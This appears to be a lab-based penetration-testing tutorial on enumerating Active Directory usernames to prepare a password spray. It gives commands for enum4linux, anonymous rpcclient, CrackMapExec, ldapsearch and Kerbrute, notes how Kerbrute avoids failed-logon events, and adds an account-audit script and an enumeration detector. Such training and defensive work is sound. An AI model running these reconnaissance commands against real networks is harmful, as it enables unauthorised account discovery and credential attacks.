Performing a successful password spray attack requires us to have a list of valid domain users. We can enumerate domain users to get a list of valid usernames in multiple ways, both from an authenticated and unauthenticated position.
Tools that can help us with user hunting:
- enum4linux
- rpcclient
- CrackMapExec
- ldapsearch
- Kerbrute
enum4linux #
enum4linux -U <ip_address>
The output will look like this
<SNIP>
| Users on <ip_address> |
index: 0x1447 RID: 0x1447 acb: 0x00020015 Account: $725000-9jb50uejje9f Name: Jessica Ramsey Desc: (null)
index: 0x4df RID: 0x4df acb: 0x00000210 Account: abinateps Name: Annamarie Carpenter Desc: (null)
index: 0x5b9 RID: 0x5b9 acb: 0x00000210 Account: abings Name: Kevin Alley Desc: (null)
index: 0x970 RID: 0x970 acb: 0x00000210 Account: ablemody Name: Gladys Mills Desc: (null)
index: 0xbef RID: 0xbef acb: 0x00000210 Account: ablemplaid Name: Patrick Deblois Desc: (null)
index: 0xcd0 RID: 0xcd0 acb: 0x00000210 Account: ablempling Name: Nancy Lane Desc: (null)
index: 0x6fe RID: 0x6fe acb: 0x00000210 Account: abless Name: Antonio Stucky Desc: (null)
index: 0xd21 RID: 0xd21 acb: 0x00000210 Account: abloome Name: Michael Johnson Desc: (null)
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[lab_adm] rid:[0x3e9]
user:[htb-student] rid:[0x457]
user:[avazquez] rid:[0x458]
<SNIP>
We can further clean it up to get just the username with some bash magic
enum4linux -U <ip_address> | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
It will look like this
avazquez
pfalcon
fanthony
wdillard
lbradford
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
rpcclient #
We can connect anonymously and run the command "enumdomusers":
rpcclient -U "" -N <ip_address>
rpcclient$> enumdomusers
The output looks like this
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[aslater] rid:[0x464]
user:[kprentiss] rid:[0x465]
user:[gdavis] rid:[0x466]
CrackMapExec #
crackmapexec smb <ip_address> --users
The output looks like this
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\pfalcon badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.919005
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\fanthony badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.919005
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\wdillard badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.934613
If we already have valid credentials for a user, we can perform an authenticated query
sudo crackmapexec smb <ip_address> -u <username> -p <password> --users
ldapsearch #
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"
The output looks like this (just for one user). Note that newer OpenLDAP releases (2.5 and later) no longer accept -h; use -H ldap://<ip_address> there instead.
# Charles Mcgurk, Operations, Logistics-LAX, Employees, Corp, INLANEFREIGHT.LOCAL
dn: CN=Charles Mcgurk,OU=Operations,OU=Logistics-LAX,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Charles Mcgurk
sn: Mcgurk
l: Cleveland
postalCode: 44114
givenName: Charles
distinguishedName: CN=Charles Mcgurk,OU=Operations,OU=Logistics-LAX,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
instanceType: 4
whenCreated: 20211027173732.0Z
whenChanged: 20220218035608.0Z
displayName: Charles Mcgurk
uSNCreated: 18935
memberOf: CN=VPN Users,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=Shared Calendar Read,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=Printer Access,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=File Share H Drive,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=File Share G Drive,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
memberOf: CN=Sales,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
uSNChanged: 2989391
department: Operations
streetAddress: 2356 Sunny Glen Lane
name: Charles Mcgurk
objectGUID:: RHryzGv3dkigEqibH7n9yw==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 132902178380127532
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132798298525782567
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAqpgO5bfzSOdKf8uq2gUAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: ladiandal
sAMAccountType: 805306368
userPrincipalName: ladiandal@inlanefreight.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
dSCorePropagationData: 20220324155258.0Z
dSCorePropagationData: 20220324154931.0Z
dSCorePropagationData: 20220322030317.0Z
dSCorePropagationData: 20220322030314.0Z
dSCorePropagationData: 16030219181425.0Z
We can clean up the output to get just the useful information
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName:
sAMAccountName: sgage
sAMAccountName: asanchez
sAMAccountName: dbranch
sAMAccountName: ccruz
sAMAccountName: njohnson
sAMAccountName: mholliday
sAMAccountName: mshoemaker
sAMAccountName: aslater
sAMAccountName: kprentiss
sAMAccountName: gdavis
Or, even nicer, keep just the value:
ldapsearch -h <ip_address> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" "
sgage
asanchez
dbranch
ccruz
njohnson
mholliday
mshoemaker
aslater
kprentiss
gdavis
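The grep/cut one-liners above for enum4linux and ldapsearch do the job, but each format needs its own pipeline, and ldapsearch folds long lines (a continuation line begins with a single space), which a plain grep will silently miss. As an added example, not code from the original notes, here is a Python script that unfolds the LDIF, pulls the account names out of all three output formats shown on this page (enum4linux/rpcclient, CrackMapExec, ldapsearch) into one normalised list, and, for the LDIF records, decodes userAccountControl (the 66048 in the output above is NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD) so an administrator can review which accounts carry settings such as PASSWD_NOTREQD or DONT_REQUIRE_PREAUTH. The sample output embedded in the script is constructed to mirror the page's formats; the second LDIF record and its flag value are invented.

```python
import re

# Constructed sample output mirroring the formats on this page (account names made up).
SAMPLE_ENUM4LINUX = """\
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[avazquez] rid:[0x458]
index: 0x4df RID: 0x4df acb: 0x00000210 Account: abinateps Name: Annamarie Carpenter Desc: (null)
"""
SAMPLE_CME = """\
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\\avazquez badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.903395
SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\\pfalcon badpwdcount: 3 baddpwdtime: 2022-02-24 18:10:01.919005
"""
# LDIF folds long lines; a continuation line starts with one space, as ldapsearch prints it.
SAMPLE_LDIF = """\
# Charles Mcgurk, Operations, Logistics-LAX, Employees, Corp, INLANEFREIGHT.LOC
 AL
dn: CN=Charles Mcgurk,OU=Operations,OU=Logistics-LAX,OU=Employees,OU=Corp,DC=I
 NLANEFREIGHT,DC=LOCAL
sAMAccountName: ladiandal
userAccountControl: 66048

dn: CN=Sam Example,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
sAMAccountName: sexample
userAccountControl: 4260384
"""

# One pattern per output format; the named group "user" captures the account name.
FORMATS = [
    re.compile(r"^user:\[(?P<user>[^\]]+)\]\s+rid:\[0x[0-9a-fA-F]+\]"),  # enum4linux / rpcclient
    re.compile(r"\bAccount:\s+(?P<user>\S+)\s+Name:"),                   # enum4linux querydispinfo
    re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+[^\\\s]+\\(?P<user>\S+)\s+badpwdcount:"),  # CrackMapExec
    re.compile(r"^sAMAccountName:\s*(?P<user>\S+)$"),                    # ldapsearch LDIF
]

def unfold_ldif(text):
    """Join LDIF continuation lines (leading space) back onto the line they belong to."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines

def extract_usernames(text):
    """Return the sorted, de-duplicated (lowercased) account names found in tool output."""
    users = set()
    for line in unfold_ldif(text):
        for pattern in FORMATS:
            m = pattern.search(line)
            if m:
                users.add(m.group("user").lower())
                break
    return sorted(users)

def parse_ldif_records(text):
    """Split LDIF into records ({attribute: [values]}); base64 values ("attr::") stay undecoded."""
    records, current = [], {}
    for line in unfold_ldif(text) + [""]:
        if not line.strip():
            if current:
                records.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, sep, value = line.partition(":")
            if sep:
                current.setdefault(attr, []).append(value.lstrip(": "))
    return records

# Selected userAccountControl bits (values as documented by Microsoft for the attribute);
# the RISKY set is what an account review should look at first.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQUIRE_PREAUTH",
}
RISKY_FLAGS = {"PASSWD_NOTREQD", "DONT_REQUIRE_PREAUTH", "TRUSTED_FOR_DELEGATION"}

def decode_uac(value):
    """Translate a decimal userAccountControl value into flag names, lowest bit first."""
    value = int(value)
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def audit_accounts(ldif_text):
    """Map sAMAccountName -> risky flag names for every LDIF record that has any set."""
    findings = {}
    for rec in parse_ldif_records(ldif_text):
        if "sAMAccountName" in rec and "userAccountControl" in rec:
            risky = [f for f in decode_uac(rec["userAccountControl"][0]) if f in RISKY_FLAGS]
            if risky:
                findings[rec["sAMAccountName"][0]] = risky
    return findings

if __name__ == "__main__":
    print(extract_usernames(SAMPLE_ENUM4LINUX + SAMPLE_CME + SAMPLE_LDIF))
    print(decode_uac(66048), audit_accounts(SAMPLE_LDIF))
```

Feed it the saved output of any of the tools (for example, the file you redirected "ldapsearch ... > users.ldif" into) instead of the embedded samples; because the patterns are tried per line, mixed output from several tools in one file is fine.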
Kerbrute #
This tool is useful because it does not trigger a failed logon event (Windows event ID 4625): it checks usernames with Kerberos pre-authentication requests rather than full logon attempts, and the domain controller answers differently for names that exist and names that do not. The caveat for a defender is that, with Kerberos auditing enabled, every probe of a non-existent name is still recorded as event ID 4768 with result code 0x6, so a burst of those from one source address is the thing to alert on.
kerbrute userenum -d <domain> --dc <ip_address> <wordlist.txt>
2025/04/17 05:13:50 > [+] VALID USERNAME: jjones@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: sbrown@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: jwilson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: tjohnson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: bdavis@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: njohnson@inlanefreight.local
2025/04/17 05:13:50 > [+] VALID USERNAME: asanchez@inlanefreight.local
2025/04/17 05:13:51 > [+] VALID USERNAME: dlewis@inlanefreight.local
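The detection side of the Kerberos caveat above, as an added example that is not part of the original notes: a small Python script that reads simplified 4768 records, groups the result-0x6 (client not found) requests by source address, and flags any source that asked for TGTs for many different non-existent names inside a short window. The one-line record format, the addresses and the names are constructed for the example (Windows' own event format is XML/EVTX, so in practice you would map the fields IpAddress, TargetUserName and Status from there); the threshold of 5 names in 60 seconds is an assumption to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified records of event ID 4768 (Kerberos TGT requested).
# result 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (the name does not exist); 0x0 = success.
# Addresses and names are invented; the one-line format is this example's own, not Windows'.
SAMPLE_EVENTS = [
    "2025-04-17T05:13:50 id=4768 ip=10.0.0.23 target=aaaron result=0x6",
    "2025-04-17T05:13:50 id=4768 ip=10.0.0.23 target=bbaker result=0x6",
    "2025-04-17T05:13:51 id=4768 ip=10.0.0.23 target=ccarter result=0x6",
    "2025-04-17T05:13:51 id=4768 ip=10.0.0.23 target=ddavis result=0x6",
    "2025-04-17T05:13:51 id=4768 ip=10.0.0.23 target=eevans result=0x6",
    "2025-04-17T05:13:52 id=4768 ip=10.0.0.23 target=ffox result=0x6",
    "2025-04-17T05:13:52 id=4768 ip=10.0.0.23 target=aaaron result=0x6",   # repeated name: no new signal
    "2025-04-17T05:20:12 id=4768 ip=10.0.0.50 target=mholiday result=0x6",  # a single typo by a real user
    "2025-04-17T05:20:30 id=4768 ip=10.0.0.50 target=mholliday result=0x0",
    "2025-04-17T05:20:31 id=4769 ip=10.0.0.50 target=mholliday result=0x0",  # service ticket, ignored
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+) id=(?P<id>\d+) ip=(?P<ip>\S+) target=(?P<target>\S+) result=(?P<result>0x[0-9a-fA-F]+)$"
)

def parse_events(lines):
    """Parse the simplified records; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            events.append({
                "ts": datetime.fromisoformat(m.group("ts")),
                "id": int(m.group("id")),
                "ip": m.group("ip"),
                "target": m.group("target").lower(),
                "result": m.group("result").lower(),
            })
    return events

def detect_enumeration(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag source addresses that requested TGTs for at least `threshold` distinct
    non-existent principals (4768, result 0x6) inside any span of length `window`.
    Returns {ip: sorted probed names} using the widest such span per source."""
    by_ip = defaultdict(list)
    for ev in parse_events(lines):
        if ev["id"] == 4768 and ev["result"] == "0x6":
            by_ip[ev["ip"]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = set(), 0
        for end in range(len(evs)):
            # Slide the window start forward until the span fits inside `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            names = {e["target"] for e in evs[start:end + 1]}
            if len(names) >= threshold and len(names) > len(best):
                best = names
        if best:
            alerts[ip] = sorted(best)
    return alerts

if __name__ == "__main__":
    for ip, names in detect_enumeration(SAMPLE_EVENTS).items():
        print(f"possible username enumeration from {ip}: {len(names)} unknown names, e.g. {names[:3]}")
```

Counting distinct names rather than raw events is what separates an enumeration run from one user repeatedly mistyping their own name; the second source in the sample (one typo, then a success) stays below the threshold.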